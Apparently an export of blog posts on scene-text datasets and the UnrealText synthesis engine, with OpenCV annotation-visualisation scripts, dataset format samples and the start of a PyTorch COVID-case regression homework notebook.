image_origin = cv2.imread(image_path)
image_bbox = image_origin.copy()
image_cbox = image_origin.copy()
height, width, _ = image_origin.shape

with open(label_path, 'r') as f:
    data = json.load(f)

# Draw the word-level boxes (and their transcriptions) on one copy of the image.
for i, b in enumerate(data['bbox']):
    points = np.array([b[j:j + 2] for j in range(0, len(b), 2)], dtype=int)
    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image_bbox, data['text'][i],
                (points[0][0], points[0][1] + int(min(height, width) / 50)),
                cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))

# Draw the character-level boxes on the other copy (transcriptions omitted here).
for c in data['cbox']:
    points = np.array([c[j:j + 2] for j in range(0, len(c), 2)], dtype=int)
    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('bbox')

axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
axes[2].axis('off')
axes[2].set_title('cbox')

plt.tight_layout()
plt.show()
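
Separately, a quick programmatic check of the bbox-vs-cbox hunch on one label file (the path is just where I happened to unpack the shard):

import json

with open(r'E:\dataset\UnrealText\sub_103\labels\93.json', 'r') as f:
    data = json.load(f)
# True would mean the word-level and character-level boxes really are identical
print(data['bbox'] == data['cbox'])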

UE demo project

| Scene Name | Baidu Drive | Google Drive |
| Realistic Rendering | Link (password: wgja) | Link |

In UE 4.22, load: Demo/Demo.uproject

UE text assets

| Resources | Baidu Drive | Google Drive |
| Background images | Link (password: 3x3r) | Link |
| Fonts and corpora | Link (password: ip8w) | Link |

Packaged scene executables

| Scenes | Baidu Drive | Google Drive |
| All 30 scene executables | Link (password: br31) | Link |

Notes

The engine achieves photorealistic lighting conditions, finds suitable text regions, and produces natural occlusions (left to right; zoomed-in views are marked with green boxes).

Real data is simply too expensive to collect; synthetic data is a good substitute. It can also provide far more detailed annotations, e.g. character-level or even pixel-level ground truth. Fantastic!

Several synthesis algorithms have proven effective for text recognition and detection:

So far, however, scene text detection still relies heavily on real-world data, and synthetic data has played only a marginal role. The authors argue that earlier synthesis algorithms (which embed text onto 2D background images, e.g. SynthText) have limitations:

• Off-the-shelf models analyze the background images only coarsely and imprecisely; these errors propagate to the text-proposal module and cause text to be embedded in implausible locations
• The text-embedding step is unaware of global image conditions such as scene illumination and occlusion

Proposed approach: text instances are treated as planar polygon meshes, with the text foregrounds loaded as textures. These meshes are placed at suitable locations in the 3D world and rendered together with the scene as a whole.

What makes this approach superior:

• Text is rendered together with the scene, achieving realistic visual effects such as illumination, occlusion, and perspective transformation

• The method has access to exact scene information (normals, depth, and object meshes) and can therefore generate better text region proposals. Both aspects are crucial for training detectors

The method consists of three components:

• A view finding algorithm that explores the virtual scene and generates camera viewpoints, yielding more diverse and natural backgrounds
• An environment randomization module that periodically changes the lighting conditions to simulate real-world variation
• A mesh-based text region generation method that probes the 3D meshes to find suitable locations for text


SynthText3D closely follows the design of SynthText:

• SynthText estimates segmentation and depth maps of the background images with off-the-shelf computer vision models
• SynthText3D instead uses the ground-truth segmentation and depth maps provided by the 3D engine

UnrealText is developed on UE4 and the UnrealCV plugin:

• Photorealistic image quality
• Efficient (about 1 to 1.5 seconds per image)
• General, and compatible with off-the-shelf 3D scene models

There are four modules in total:

• Viewfinding
  • Automatically determines a set of reasonable, non-trivial camera positions and rotations over the whole space of the 3D scene, pruning unsuitable viewpoints (e.g. from inside an object mesh)
• Environment Randomization
  • To reproduce real-world variation such as lighting conditions, the intensity, color, and direction of all light sources in the scene are randomized; fog is added and its intensity is randomized as well
• Text Region Generation
  • Finds text regions by probing the object meshes in the 3D world, retrieving the ground-truth normal map to generate initial text region proposals
  • Projects the initial proposals onto the 3D world using the object meshes and refines them there
  • Samples a subset of the refined proposals for rendering
• Text Rendering

EAST is used as the detector for training, with these benchmark datasets:

• ICDAR 2013
• ICDAR 2015
• MLT 2017

Experiment: training on purely synthetic data

EAST models are first trained on each synthetic dataset separately, to compare this method with previous ones directly and quantitatively. Note that UnrealText, SynthText3D, SynthText, and VISD contain different numbers of images, so the number of images used also has to be controlled in the experiments.

With 10K images:

| Training Data | IC15 | IC13 | MLT 2017 |
| SynthText 10K | 46.3 | 60.8 | 38.9 |
| VISD 10K (full) | 64.3 | 74.8 | 51.4 |
| SynthText3D 10K (full) | 63.4 | 75.6 | 48.3 |
| UnrealText 10K | 65.2 | 78.3 | 54.2 |

With the full datasets:

| Training Data | IC15 | IC13 | MLT 2017 |
| SynthText 800K (full) | 58.0 | 67.7 | 44.8 |
| UnrealText 600K (full) | 67.8 | 80.6 | 56.3 |

Experiment: complementary synthetic data

A distinctive feature of UnrealText is that its images are generated from 3D scene models rather than from real background images, which creates a potential domain gap due to the differing artistic styles. The experiment therefore trains on UnrealText data (5K) plus VISD data (5K); as the table shows, this achieves better performance than the other 10K synthetic datasets.

The UnrealText + VISD combination also outperforms SynthText3D + VISD. This suggests that UnrealText is complementary to existing synthetic datasets that use real images as backgrounds: while UnrealText simulates photorealistic effects, synthetic data with real background images helps adaptation to real-world datasets.

| Training Data | IC15 | IC13 | MLT 2017 |
| SynthText3D 5K + VISD 5K | 65.4 | 78.6 | 55.2 |
| UnrealText 5K + VISD 5K | 66.9 | 80.4 | 55.7 |

Experiment: combining synthetic and real data

One important role of synthetic data is to serve as pretraining data and further improve performance on domain-specific real datasets. EAST models are first pretrained on the different synthetic datasets and then fine-tuned on the in-domain data.

Experiment: pretraining on the full dataset

When the detector is pretrained on the full dataset, performance improves significantly, demonstrating the scalability advantage of the engine. In particular, the EAST model reaches an F1 score of 74.1 on MLT17, better even than recent state-of-the-art results such as 73.9 for CRAFT and 73.1 for LOMO. Although the margins are small, it is fair to claim that, with the help of this synthetic dataset, the EAST model recovers state-of-the-art performance.

Running it

Prepare Unreal Engine 4.22:

Download the UnrealCV source from unrealcv/unrealcv at 4.22 (github.com). Versions after 4.16 have no prebuilt releases, so you have to build it yourself, and you must pick the 4.22 branch in the repository, otherwise it will not work:

Build the UnrealCV plugin from the command line:

    conda create -n unreal python=3.9
    conda activate unreal
cd path/to/unrealcv  # the directory of the cloned repository
    python build.py

The build produces the plugin files:

    BUILD SUCCESSFUL
    AutomationTool exiting with ExitCode=0 (Success)

Download the demo project from the Link: DemoProject.tar_5.gz. Extract it to get the Demo Project:

In Plugins, replace the bundled plugin with the freshly built UnrealCV plugin.

Now you can open the project!

    ]]>
@@ -6605,7 +6605,7 @@ /posts/Dataset-%E6%94%B6%E9%9B%86%E4%B8%80%E4%B8%8B%E6%96%87%E6%9C%AC%E7%9A%84%E5%90%84%E7%A7%8D%E6%95%B0%E6%8D%AE%E9%9B%86/ - Preface

Let me collect various text-related datasets! Thanks to my senior labmate for sharing.

Main content

Real datasets

CTW dataset (Chinese Text in the Wild)

A dataset of Chinese characters in natural scenes.

Resources:

It contains:

• 32,285 high resolution images
• 1,018,402 character instances
• 3,850 character categories (distinct Chinese characters)
• 6 attributes

Dataset structure:

• Training + validation sets: images-trainval
• Test set: images-test
• Pretrained models: trained-models
  • alexnet
  • inception
  • overfeat
  • resnet
  • vgg
  • yolo
• Annotations: ctw-annotations

For example, for the file 0000172.jpg in the training set:


    0000172.jpg
    {"annotations": [[
    {
    "adjusted_bbox": [140.26028096262758, 897.1957001682758, 22.167573140645146, 38.36424196832945],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[140.26028096262758, 896.7550603352049], [162.42785410327272, 898.0769798344178], [162.42785410327272, 935.7929346470926], [140.26028096262758, 935.0939571156308]],
    "text": "\u660e"
    },
    {
    "adjusted_bbox": [162.42785410327272, 898.5416545674744, 23.376713493771263, 37.74268246537315],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[162.42785410327272, 898.0769798344178], [185.80456759704398, 899.4710040335876], [185.80456759704398, 936.5300382257251], [162.42785410327272, 935.7929346470926]],
    "text": "\u6d77"
    },
    ……
    "image_id": "0000172", "width": 2048}

The corresponding annotation; every character instance has:

• adjusted_bbox: the adjusted bounding box

• attributes: text attributes

  • distorted
  • raised: embossed
  • occluded
  • bgcomplex: complex background
  • handwritten
  • wordart: art text
• is_chinese: whether it is Chinese

• polygon: the actual bounding polygon

• text: the Chinese character, stored as a Unicode escape
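
To get a feel for these attributes, a small tallying sketch (it assumes the annotations ship as one JSON object per image, one per line, in a file like ctw-annotations/train.jsonl):

import json
from collections import Counter

attr_counts = Counter()
with open('ctw-annotations/train.jsonl', 'r', encoding='utf-8') as f:
    for line in f:
        image_anno = json.loads(line)
        # "annotations" is a list of text lines; each line is a list of character instances
        for sentence in image_anno['annotations']:
            for char in sentence:
                if char['is_chinese']:
                    attr_counts.update(char['attributes'])
print(attr_counts.most_common())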

    SVT (Street View Text Dataset)

    The Street View Text (SVT) dataset was harvested from Google Street View. Image text in this data exhibits high variability and often has low resolution. In dealing with outdoor street level imagery, we note two characteristics.

    (1) Image text often comes from business signage and

    (2) business names are easily available through geographic business searches.

    These factors make the SVT set uniquely suited for word spotting in the wild: given a street view image, the goal is to identify words from nearby businesses.


Resources:

For example, for the file 17_18.jpg in the dataset:


    17_18.jpg

The corresponding ground truth: one box per word, plus metadata such as the address and scene information:

<image>
    <imageName>img/17_18.jpg</imageName>
    <address>420 South 1st Street San Jose CA 95112</address>
    <lex>SOUTH,FIRST,BILLIARDS,CLUB,AND,LOUNGE,AGENDA,RESTAURANT,BAR,RAMADA,LIMITED,SAN,JOSE,WET,NIGHTCLUB,MOTIF,ANNO,DOMINI,EULIPIA,DOWNTOWN,YOGA,SHALA,WHIPSAW,INC,ZOE,SAINTE,CLAIRE,HOTEL,SCORES,SPORTS,GRILL,WORKS,SPY,MUSEUM,QUILTS,TEXTILES,MIAMI,BEACH,STAGE,COMPANY,CACTUS,ANGELS,DAI,THANH,SUPERMARKET</lex>
    <Resolution x="1024" y="768"/>
    <taggedRectangles>
        <taggedRectangle height="41" width="152" x="480" y="403">
            <tag>BILLIARDS</tag>
        </taggedRectangle>
        <taggedRectangle height="33" width="78" x="407" y="410">
            <tag>FIRST</tag>
        </taggedRectangle>
        <taggedRectangle height="30" width="85" x="322" y="416">
            <tag>SOUTH</tag>
        </taggedRectangle>
    </taggedRectangles>
</image>
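
A minimal parsing sketch for this format (the path svt1/test.xml is an assumption; adjust it to wherever the ground-truth file lives):

import xml.etree.ElementTree as ET

tree = ET.parse('svt1/test.xml')
for image in tree.getroot().iter('image'):
    name = image.findtext('imageName')
    lexicon = image.findtext('lex').split(',')   # the per-image lexicon for word spotting
    for rect in image.iter('taggedRectangle'):
        x, y = int(rect.get('x')), int(rect.get('y'))
        w, h = int(rect.get('width')), int(rect.get('height'))
        word = rect.findtext('tag')
        print(name, word, (x, y, w, h), word in lexicon)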

    ICDAR

Resources:

    Downloads - Focused Scene Text

Task 2.1: Text Localization (2013 edition)
• Training set: 229 images
• Test set: 233 images

For example, for the file img_1.jpg in the training set:

    img_1.jpg

The corresponding ground truth gt_img_1.txt:

    38, 43, 920, 215, "Tiredness"
    275, 264, 665, 450, "kills"
    0, 699, 77, 830, "A"
    128, 705, 483, 839, "short"
    542, 710, 938, 841, "break"
    87, 884, 457, 1021, "could"
    517, 919, 831, 1024, "save"
    166, 1095, 468, 1231, "your"
    530, 1069, 743, 1206, "life"

Visualization code for the dataset:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 1

image_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task12_Images/'
label_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task1_GT/'

image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    # each line: xmin, ymin, xmax, ymax, "transcription"
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1][2:-2]   # strip the leading space/quote and trailing quote/newline
    points = np.array([(coords[j], coords[j + 1]) for j in range(0, len(coords), 2)])
    cv2.rectangle(image, (points[0][0], points[0][1]), (points[1][0], points[1][1]), (255, 0, 0), 2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image, transcriptions,
                (points[0][0], points[0][1] - int(min(height, width) / 150)),
                cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()


    Task 2.2: Text Segmentation (2013 edition)

The dataset is the same as for 2.1, except the ground truth consists of segmentation masks, e.g. gt_img_1.png:


    gt_img_1.png
    Task 2.3: Word Recognition (2013 edition)
• Training set: 848 word images: Challenge2_Training_Task3_Images_GT
• Test set: 1,095 word images: Challenge2_Test_Task3_Images and Challenge2_Test_Task3_GT.txt

These images are all cropped out of the previous dataset.

For example, for the file word_1.png in the training set:

    word_1.png

The corresponding line in the ground truth gt.txt:

    word_1.png, "PROPER"
    Task 2.4: End to End (2015 edition)

The task wants the network to recognize words, and provides a vocabulary list?

• Training set: 229 images
• Test set: 233 images

The image img_1.jpg, its ground truth gt_img_1.txt, and the vocabulary voc_img_1.txt:

    img_1.jpg、gt_img_1.txt、voc_img_1.txt

    Downloads - Incidental Scene Text

    Task 4.1: Text Localization (2015 edition)

The image quality is really brutal, orz

• Training set: 1,000 images
• Test set: 500 images

For example, for the file img_2.jpg in the test set:

    img_2.jpg

The corresponding ground truth gt_img_2.txt:

    790,302,903,304,902,335,790,335,JOINT
    822,288,872,286,871,298,823,300,yourself
    641,138,657,139,657,151,641,151,###
    669,139,693,140,693,154,669,153,154
    700,141,723,142,723,155,701,154,197
    637,101,721,106,722,115,637,110,###
    668,157,693,158,693,170,668,170,727
    636,155,661,156,662,169,636,168,198
    660,82,700,85,700,99,660,96,20029
    925,252,973,254,973,262,925,262,###
    789,284,818,284,818,297,789,297,Free
    875,286,902,289,903,298,875,298,from
    791,337,863,337,863,364,791,364,PAIN
    794,445,818,445,818,473,794,473,###
    922,440,962,442,963,462,922,463,###
    924,476,967,476,968,489,924,491,###
    924,505,962,506,965,518,923,519,###
    847,524,887,524,887,555,847,555,###
    791,474,822,474,822,500,791,500,###
    780,582,910,576,909,583,780,588,###
    854,456,902,455,902,465,854,467,###
    854,467,903,467,903,480,854,480,###

Visualization code for the dataset:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 463

image_dir = r'XXX/ICDAR_2015/test_img/'
label_dir = r'XXX/ICDAR_2015/test_gt/'

image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    # each line: x1,y1,x2,y2,x3,y3,x4,y4,transcription (a quadrilateral plus the text)
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1].strip()   # drop the trailing newline
    points = np.array([(coords[j], coords[j + 1]) for j in range(0, len(coords), 2)])
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image, transcriptions,
                (points[0][0], points[0][1] - int(min(height, width) / 150)),
                cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()

The ground truth corresponding to the image shown:

1111,459,1266,495,1259,586,1104,550,FESTIVE
1100,523,1261,603,1244,719,1083,639,SALE
    Task 4.2: Text Segmentation (N/A)

Not available.

    Task 4.3: Word Recognition (2015 edition)

Word images cropped from the previous dataset.

• Training set: 4,468 cropped word images
• Test set: 2,077 cropped word images

For example, for the file word_10.png in the test set:

    word_10.png

The corresponding line in Challenge4_Test_Task3_GT.txt:

    word_10.png, "PAIN"
    Task 4.4: End to End (2015 edition)

Hmm, this feels like a consolidation of the previous tasks, with a vocabulary list added.

• Training set: 1,000 images
• Test set: 500 images

    ICDAR2017 Competition on Reading Chinese Text in the Wild (RCTW-17)

The images in this one are a really mixed bag...

Resources:

For example, for the file image_0.jpg in the training set:

    image_0.jpg

The corresponding ground truth image_0.txt:

Each line gives the bounding box, a difficulty flag for whether the text is legible (0 = legible, 1 = hard/illegible), and the transcription:

    390,902,1856,902,1856,1225,390,1225,0,"金氏眼镜"
    1875,1170,2149,1170,2149,1245,1875,1245,0,"创于 1989"
    2054,1277,2190,1277,2190,1323,2054,1323,0,"城建店"
    768,1648,987,1648,987,1714,768,1714,0,"金氏眼"
    897,2152,988,2152,988,2182,897,2182,0,"金氏眼镜"
    1457,2228,1575,2228,1575,2259,1457,2259,0,"金氏眼镜"
    1858,2218,1966,2218,1966,2250,1858,2250,0,"金氏眼镜"
    231,1853,308,1843,309,1885,230,1899,1,"谢#惠顾"
    125,2270,180,2270,180,2288,125,2288,1,"###"
    106,2297,160,2297,160,2316,106,2316,1,"###"
    22,2363,82,2363,82,2383,22,2383,1,"###"
    524,2511,837,2511,837,2554,524,2554,1,"###"
    455,2456,921,2437,920,2478,455,2501,0,"欢迎光临"
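
Since the transcription is quoted and may itself contain commas, csv.reader is a convenient way to split these lines (a sketch; the path is illustrative):

import csv

with open('RCTW-17/train_gts/image_0.txt', 'r', encoding='utf-8-sig') as f:
    for row in csv.reader(f):
        coords = list(map(int, row[:8]))   # four corner points of the quadrilateral
        difficult = row[8] == '1'          # 1 = hard / illegible
        text = row[9]
        print(coords, difficult, text)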

    Total-Text

Resources: Total-Text Dataset | Papers With Code

A curved-text dataset:

• Training set: 1,255 images
• Test set: 300 images

Mostly English text, with a small amount of Chinese.

For example, for the file img11.jpg in the training set:

    img11.jpg

The corresponding Character_Level_Mask ground truth img11.jpg:

    img11.jpg

The corresponding Text_Region_Mask ground truth img11.png:

    img11.png

There are also .mat files, poly_gt_img11.mat and rect_gt_img11.mat, which presumably store some shape information.
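
An easy way to check what they actually contain (a sketch; the path is illustrative):

from scipy.io import loadmat

gt = loadmat('Total-Text/poly_gt_img11.mat')
# list the stored variables, skipping MATLAB's internal __header__/__version__/__globals__ keys
print([k for k in gt.keys() if not k.startswith('__')])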

    TextSeg

Resources: Rethinking Text Segmentation: A Novel Dataset and A Text-Specific Refinement Approach

A text segmentation dataset of designed/art text:

• 4,024 images, each with a text segmentation map

For example, for the file a00001.jpg under image/ in the dataset:

    a00001.jpg

The corresponding per-character segmentation mask a00001_mask.png under bpoly_label/:

The JSON file a00001_anno.json:

{
    "0000": {
        "text": "WHY",
        "bbox": [300, 264, 799, 264, 799, 521, 300, 521],
        "char": {
            "00": { "text": "W", "bbox": [304, 270, 519, 270, 519, 517, 304, 517], "mask_value": 1 },
            "01": { "text": "H", "bbox": [514, 278, 650, 278, 650, 521, 514, 521], "mask_value": 2 },
            "02": { "text": "Y", "bbox": [651, 272, 800, 272, 800, 521, 651, 521], "mask_value": 3 }
        }
    },
    "0001": {
        "text": "ME?",
        "bbox": [334, 514, 762, 514, 762, 764, 334, 764],
        "char": {
            "00": { "text": "M", "bbox": [336, 513, 518, 513, 518, 761, 336, 761], "mask_value": 4 },
            "01": { "text": "E", "bbox": [514, 514, 639, 514, 639, 761, 514, 761], "mask_value": 5 },
            "02": { "text": "?", "bbox": [637, 517, 758, 517, 758, 762, 637, 762], "mask_value": 6 }
        }
    }
}
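
A small cross-check sketch, under the assumption that the pixel values in a00001_mask.png are exactly the mask_value integers from the JSON:

import json
import numpy as np
from PIL import Image

mask = np.array(Image.open('bpoly_label/a00001_mask.png'))
with open('bpoly_label/a00001_anno.json', 'r', encoding='utf-8') as f:
    anno = json.load(f)

for word in anno.values():
    for char in word['char'].values():
        # count the pixels labeled with this character's mask_value
        n_pixels = int((mask == char['mask_value']).sum())
        print(char['text'], n_pixels, 'pixels')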

The segmentation map a00001_maskfg.png under semantic_label/:


    a00001_maskfg.png

    CTW 1500

    • [Paper-Detecting Curve Text in the Wild-New Dataset and New Solution-Zi-Zi’s Journey](…/…/…/…/2023/07/14/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/)

Synthetic datasets

    SynthText

    • [Paper-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/04/21/Paper-Synthetic Data for Text Localisation in Natural Images/)

    • [Paper-重读-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/09/05/Paper-重读-Synthetic Data for Text Localisation in Natural Images/)

    VISD

    • [Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes-Zi-Zi’s Journey](…/…/…/…/2023/08/25/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/)

    SynthText3D

    • [Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds-Zi-Zi’s Journey](…/…/…/…/2023/09/12/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/)

    UnrealText

    • Plan-对论文的目前想法-Zi-Zi’s Journey

    • [Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World-Zi-Zi’s Journey](…/…/…/…/2023/05/23/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/)

    ]]>
    @@ -6665,7 +6665,7 @@ /posts/Pytorch-%E6%94%BE%E4%B8%80%E6%94%BE%E4%B9%8B%E5%89%8D%E7%9C%8B%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BB%A3%E7%A0%81/ - Homework 1: COVID-19 Cases Prediction (Regression)

    Objectives:

• Solve a regression problem with deep neural networks (DNN).
• Understand basic DNN training tips.
• Familiarize yourself with PyTorch.

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    # check gpu type
    !nvidia-smi
Tue May  2 06:43:11 2023
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 525.85.12    Driver Version: 525.85.12    CUDA Version: 12.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            Off  | 00000000:00:04.0 Off |                    0 |
| N/A   60C    P8    11W /  70W |      0MiB / 15360MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

    Download data

    If the Google Drive links below do not work, you can use the dropbox link below or download data from Kaggle, and upload data manually to the workspace.


    # google drive link
    # !gdown --id '1BjXalPZxq9mybPKNjF3h5L3NcF7XKTS-' --output covid_train.csv
    # !gdown --id '1B55t74Jg2E5FCsKCsUEkPKIuqaY7UIi1' --output covid_test.csv

    # dropbox link
    !wget -O covid_train.csv https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0
    !wget -O covid_test.csv https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0
--2023-05-02 06:43:11--  https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0
Resolving www.dropbox.com (www.dropbox.com)... 162.125.1.18, 2620:100:6016:18::a27d:112
Connecting to www.dropbox.com (www.dropbox.com)|162.125.1.18|:443... connected.
HTTP request sent, awaiting response... 302 Found
...
HTTP request sent, awaiting response... 200 OK
Length: 2162766 (2.1M) [text/plain]
Saving to: ‘covid_train.csv’

covid_train.csv     100%[===================>]   2.06M  4.86MB/s    in 0.4s

2023-05-02 06:43:12 (4.86 MB/s) - ‘covid_train.csv’ saved [2162766/2162766]

--2023-05-02 06:43:13--  https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0
...
HTTP request sent, awaiting response... 200 OK
Length: 638359 (623K) [text/plain]
Saving to: ‘covid_test.csv’

covid_test.csv      100%[===================>] 623.40K  --.-KB/s    in 0.04s

2023-05-02 06:43:14 (16.9 MB/s) - ‘covid_test.csv’ saved [638359/638359]

    Import packages

# Numerical Operations
import math
import numpy as np

# Reading/Writing Data
import pandas as pd
import os
import csv

# For Progress Bar
from tqdm import tqdm

# Pytorch
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader, random_split

# For plotting learning curve
from torch.utils.tensorboard import SummaryWriter

Some Utility Functions

    You do not need to modify this part.

def same_seed(seed):
    '''Fixes random number generator seeds for reproducibility.'''
    torch.backends.cudnn.deterministic = True  # make CuDNN deterministic so runs are repeatable
    torch.backends.cudnn.benchmark = False     # disable CuDNN auto-tuning, another source of nondeterminism
    np.random.seed(seed)                       # seed NumPy's RNG
    torch.manual_seed(seed)                    # seed PyTorch's CPU RNG
    if torch.cuda.is_available():
        torch.cuda.manual_seed_all(seed)       # seed the GPU RNGs as well

def train_valid_split(data_set, valid_ratio, seed):
    '''Split provided training data into training set and validation set.'''
    valid_set_size = int(valid_ratio * len(data_set))  # size of the validation split
    train_set_size = len(data_set) - valid_set_size    # the remainder is the training split
    # random_split takes the dataset, a list of split sizes, and a seeded generator
    train_set, valid_set = random_split(data_set, [train_set_size, valid_set_size],
                                        generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set)    # return both splits as NumPy arrays

def predict(test_loader, model, device):
    '''
    Run a trained model over the test set and return its predictions.
    test_loader: a PyTorch DataLoader that yields the test data batch by batch
    model:       a trained network
    device:      the compute device, e.g. "cpu" or "cuda"
    '''
    model.eval()                 # set the model to evaluation mode
    preds = []                   # collects the per-batch predictions
    for x in tqdm(test_loader):  # iterate over the test data batch by batch
        x = x.to(device)         # move the current batch to the target device
        with torch.no_grad():    # no gradient bookkeeping needed for inference
            pred = model(x)
            preds.append(pred.detach().cpu())
    # concatenate all batch predictions along the batch dimension and convert to NumPy
    preds = torch.cat(preds, dim=0).numpy()
    return preds

    Dataset

    class COVID19Dataset(Dataset):
        '''
        x: Features.
        y: Targets; if None, do prediction.
        '''
        def __init__(self, x, y=None):
            if y is None:
                self.y = y                     # no targets: this is a test/prediction dataset
            else:
                self.y = torch.FloatTensor(y)  # convert the targets to a tensor
            self.x = torch.FloatTensor(x)

        def __getitem__(self, idx):
            if self.y is None:
                return self.x[idx]               # return the features only
            else:
                return self.x[idx], self.y[idx]  # return the features and the corresponding target

        def __len__(self):
            return len(self.x)  # number of samples in the dataset

    Neural Network Model

    Try out different model architectures by modifying the class below.

    class My_Model(nn.Module):  # a custom PyTorch model, subclassing nn.Module
        def __init__(self, input_dim):  # input_dim is the dimensionality of the input features
            super(My_Model, self).__init__()  # initialize the parent nn.Module
            # TODO: modify model's structure, be aware of dimensions.
            # self.layers stacks several layers into one network that maps the
            # input features to a prediction; nn.Sequential composes them in order.
            # Here: 3 linear layers with 2 ReLU activations in between.
            self.layers = nn.Sequential(
                nn.Linear(input_dim, 16),
                nn.ReLU(),
                nn.Linear(16, 8),
                nn.ReLU(),
                nn.Linear(8, 1)
            )

        def forward(self, x):
            '''Forward pass: the input x flows through the stack of layers to produce the prediction.'''
            x = self.layers(x)  # apply the linear layers and activations
            x = x.squeeze(1)    # (B, 1) -> (B): drop the trailing dimension so the output matches the target shape
            return x
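
    As one illustration of a "different architecture" (an assumption for illustration only, not the assignment's reference answer), a slightly wider variant with dropout could look like this:

    class My_Model_Wide(nn.Module):
        def __init__(self, input_dim):
            super().__init__()
            self.layers = nn.Sequential(
                nn.Linear(input_dim, 64),
                nn.ReLU(),
                nn.Dropout(0.1),   # light regularization; 0.1 is an arbitrary choice
                nn.Linear(64, 32),
                nn.ReLU(),
                nn.Linear(32, 1)
            )

        def forward(self, x):
            return self.layers(x).squeeze(1)  # (B, 1) -> (B), same as above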

    Feature Selection

    Choose the features you deem useful by modifying the function below.

    def select_feat(train_data, valid_data, test_data, select_all=True):
        '''
        Selects useful features to perform regression.
        train_data, valid_data, test_data are the training, validation, and test arrays;
        select_all (default True) controls whether every feature column is used.
        '''
        # The label is the last column of the training and validation arrays.
        y_train, y_valid = train_data[:,-1], valid_data[:,-1]
        # Everything except the label column is kept as raw input features.
